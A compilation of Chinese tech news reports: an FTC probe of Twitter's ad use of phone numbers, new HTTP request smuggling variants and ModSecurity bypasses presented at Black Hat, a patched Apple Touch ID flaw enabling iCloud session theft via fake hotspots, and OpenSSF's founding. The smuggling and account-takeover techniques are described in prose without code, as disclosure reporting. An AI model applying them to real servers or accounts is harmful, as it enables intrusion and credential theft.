北京时间8月4日早间消息,美国联邦贸易委员会(Federal Trade Commission)目前正在对Twitter公司进行调查,原因是该公司使用用户上传的电话号码,以投放广告。 Twitter周一在一份监管文件中称,上周收到了来自联邦贸易委员会的投诉草案,指控该社交媒体公司违反了2011年达成的一份和解协议。根据该协议,Twitter同意采取措施,更好地保护用户的个人数据。 这家总部位于旧金山的公司在监管文件中说,这项调查可能给公司带来1.5~2.5亿美元的损失。 Twitter在文件中说:“这件事仍未解决,目前还无法确定何时解决以及如何解决。” “在我们公布第二季度财报后,我们收到了联邦贸易委员会的投诉草案,指控我们违反了2011年的和解协议,”Twitter发言人说。 联邦贸易委员会发言人拒绝对此发表评论。 2011年,Twitter与联邦贸易委员会达成一项和解协议。根据该协议,在20年内,针对非公开型的消费者个人信息,Twitter被禁止“在这些信息的安全、隐私和保密程度方面误导消费者。” 用户经常会出于安全目的向Twitter提供其电话号码。Twitter在2019年证实,它正在使用这些电话号码,向用户投放广告。当时,Twitter表示,这些数字是“无意中”使用的,并补充说,它不知道有多少用户受到了影响。 监管文件显示,联邦贸易委员会指控该公司在“2013年至2019年期间”滥用用户电话号码或电子邮件,从而违反了和解协议条款。(樵风) (稿源:新浪科技,封面源自网络。)

研究人员演示了 4 种 HTTP 请求走私攻击的新变种

一项新的研究确定了四种针对HTTP请求走私攻击的新变种,它们可以针对各种商用现成的Web服务器和HTTP代理服务器。 SafeBreach安全研究副总裁Amit Klein在8月5日的Black Hat安全会议上介绍了调查结果,他说,这种攻击突显了Web服务器和HTTP代理服务器仍然易受HTTP请求走私的影响(即使自首次记录以来已有15年)。 什么是HTTP请求走私? HTTP请求走私(或HTTP异步)是一种用于干扰网站处理从一个或多个用户接收的HTTP请求序列的方式的技术。 当前端服务器(负载平衡器或代理)和后端服务器以不同的方式解释HTTP请求的边界时,通常会出现与HTTP请求走私有关的漏洞,从而使不良行为者发送(或“走私”)模糊请求,此优先于下一个合法用户请求。 请求的这种不同步可以被用来劫持凭据,向用户注入响应,甚至从受害者的请求中窃取数据,并将信息泄露给攻击者控制的服务器。 该技术首次展示于2005年一组来自Watchfire的研究人员,其中包括Klein,Chaim Linhart,Ronen Heled和Steve Orrin。但是在过去的五年中,已经设计了许多改进,在攻击面上进行了扩展,以将请求拼接成其他请求,并“获得对内部API的最大权限访问”,污染Web缓存,并破坏流行应用程序的登录页面。 新的威胁 Klein公开的新变体涉及使用各种代理服务器组合,包括在Web服务器模式下的Aprelium的Abyss,Microsoft IIS,Apache和Tomcat,以及在HTTP代理模式下的Nginx,Squid,HAProxy,Caddy和Traefik。 所有四个新变体的列表如下,其中包括一个由研究人员在实验中成功利用的旧变体。 变体1:“标头SP / CR垃圾邮件:……” 变体2 –“等待” 变体3 – HTTP / 1.2绕过类似于mod_security的防御 变体4 –一个简单的解决方案 变体5 –“ CR标头” 例如,在处理包含两个Content-Length标头字段的HTTP请求时,发现Abyss接受第二个标头为有效,而Squid使用第一个Content-Length标头,从而导致两个服务器以不同的方式解释请求并实现请求走私。 在Abyss收到长度小于指定的Content-Length值的主体的HTTP请求的情况下,它将等待30秒以完成该请求,但不会忽略该请求的其余主体。Klein发现,这也导致Squid与Abyss之间存在差异,后者会将出站HTTP请求的部分解释为第二个请求。 攻击的第三种形式使用HTTP / 1.2来规避OWASP ModSecurity中定义的WAF防御用于防止HTTP请求走私攻击的核心规则集(CRS)会生成触发该行为的恶意有效负载。 最后,克莱因(Klein)发现使用“ Content-Type:text / plain”标头字段足以绕过CRS中指定的偏执狂级别检查1和2,并产生HTTP请求走私漏洞。 有哪些可能的防御措施? 在将发现披露给Aprelium,Squid和OWASP CRS之后,问题已在Abyss X1 v2.14,Squid版本4.12和5.0.3和CRS v3.3.0中修复。 Klein呼吁规范来自代理服务器的出站HTTP请求,强调了对开源、强大的Web应用程序防火墙解决方案的需求,该解决方案能够处理HTTP请求走私攻击。 Klein指出:“ ModSecurity(与CRS结合使用)确实是一个开源项目,但是就稳健性和通用性而言,mod_security具有多个缺点。” “它不能提供针对HTTP请求走私的全面保护,并且仅可用于Apache,IIS和nginx。” 为此,Klein发布了一个基于C ++的库,该库通过严格遵守HTTP标头格式和请求行格式来确保所有传入的HTTP请求都是完全有效,合规且明确的。可以点击此处GitHub来访问。     稿件与封面来源:The Hacker News,译者:叶绿体。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

Apple Touch ID漏洞可能会让攻击者劫持 iCloud 帐户

苹果今年早些时候修复了iOS和macOS中的一个安全漏洞,该漏洞可能允许攻击者未经授权访问用户的iCloud帐户。 IT安全公司Computest的安全专家Thijs Alkemade于2月发现了该漏洞,该漏洞存在于Apple实施的TouchID(或FaceID)生物识别功能上,该功能对用户进行了身份验证以登录Safari上的网站,特别是那些使用Apple ID登录的网站。 该漏洞通过披露程序将问题报告给Apple后,iPhone制造商在服务器端更新中解决了该漏洞。 认证缺陷 漏洞的核心主要是:当用户尝试登录需要Apple ID的网站时,将提示以使用Touch ID对登录进行身份验证。这样做会跳过两因素身份验证步骤,因为它已经利用了多种因素进行标识,例如设备和生物特征信息。 在登录到Apple域(例如“ icloud.com”)时,通常会使用ID和密码进行对比,其中网站嵌入了指向Apple登录验证服务器(“ https://idmsa.apple.com”)的iframe,来处理身份验证过程。 URL还包含其他两个参数-标识服务(例如iCloud)的“ client_id”和具有成功验证后要重定向到的URL的“ redirect_uri”。 但是,在使用TouchID验证用户的情况下,iframe的处理方式有所不同,因为它与AuthKit守护程序(akd)通信以处理生物识别身份验证,并随后检索icloud.com使用的令牌(“ grant_code”)页面以继续登录过程。 为此,daemon与“ gsa.apple.com”上的API通信,向该API发送请求的详细信息,并从该API接收令牌。 Computest发现的安全漏洞存在于上述gsa.apple.com API中,从理论上讲,它可以滥用这些域来验证客户端ID,而无需进行身份验证。 Alkemade指出:“即使akd提交给它的数据中包含client_id和redirect_uri,它也不会检查重定向URI是否与客户端ID相匹配。” “相反,AKAppSSOExtension仅在这些域上应用了白名单。所有以apple.com,icloud.com和icloud.com.cn结尾的域都被允许。”意味着攻击者可以利用Apple任意一个子域上的跨站点脚本漏洞来运行JavaScript代码的恶意代码段,这些代码段可以使用iCloud客户端ID触发登录提示,并使用授权令牌在icloud上获取会话.com。 设置伪热点来接管iCloud帐户 在另一种情况下,可以通过在第一次连接到Wi-Fi网络(通过“ captive.apple.com”)时显示的网页上嵌入JavaScript来执行攻击,从而使攻击者可以访问用户,只需接受该页面上的TouchID提示即可创建该帐户。 “恶意Wi-Fi网络可以与JavaScript启动的OAuth作为iCloud的网页回应,” 艾尔克梅德说。“用户会收到一个TouchID提示,但不清楚含义是什么。如果用户在该提示下进行身份验证,则其会话令牌将被发送到恶意站点,从而使攻击者可以在iCloud上为其帐户提供会话。” “通过在用户希望接收热点的位置(例如,在机场,酒店或火车站)设置一个伪造的热点,就有可能获得访问大量iCloud帐户的权限,允许访问图片的备份,手机的位置,文件等等。” 这并不是Apple第一次在身份验证基础结构中发现安全问题。苹果在5月修补了一个影响其“用Apple登录”系统的漏洞,该漏洞使远程攻击者可以绕过身份验证,并接管已使用Apple登录功能注册的第三方服务和应用程序上目标用户的帐户。     稿件与封面来源:The Hacker News,译者:叶绿体。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

Linux 基金会联合厂商成立开源安全基金会 OpenSSF

Linux 基金会宣布与多家硬件和软件厂商合作,共同成立了开源安全基金会(OpenSSF),这是一项跨行业的合作,通过建立具有针对性的计划和最佳实践的更广泛的社区,并将领导者聚集在一起,以提升开源软件安全性。 OpenSSF 的成员来自核心基础设施联盟(Core Infrastructure Initiative)、GitHub 开源安全联盟和和其他创始董事会成员,例如 GitHub、Google、IBM、摩根大通、微软、NCC 集团、OWASP 基金会 和 Red Hat。其他创始成员还包括 ElevenPaths, GitLab, HackerOne, Intel, Okta, Purdue, SAFECode, StackHawk, Trail of Bits, Uber 和 VMware。 按照 OpenSSF 官网的介绍,基金会的治理、技术社区及其决策将是透明的,开发的任何规范和项目都将与供应商无关。OpenSSF 致力于与上游社区以及与现有社区的协作和合作,以提升开源安全性。也就是说他们旨在成为一个透明的组织,借此促进厂商之间的合作并提升安全性。 组织的正式成立包括设立一个理事会(Governing Board),一个技术咨询委员会(Technical Advisory Council),并对每个工作组和项目进行单独的监督。OpenSSF 打算举办多项开源技术计划,以支持世界上最关键的开源软件的安全性,所有这些都将在 GitHub 上公开进行。 最初的 OpenSSF 技术咨询委员会得到了来自 GitHub、谷歌、摩根大通、IBM、红帽、微软和 NCC 集团等利益相关者的支持。他们将致力于增强安全工具性能和安全最佳实践、提升识别威胁能力、确保关键项目安全、改进开发者身份验证机制以及类似的举措。 详情查看 OpenSSF.org。 相关链接 Linux 的详细介绍:点击查看 Linux 的下载地址:点击下载     (稿源:开源中国,封面源自网络。)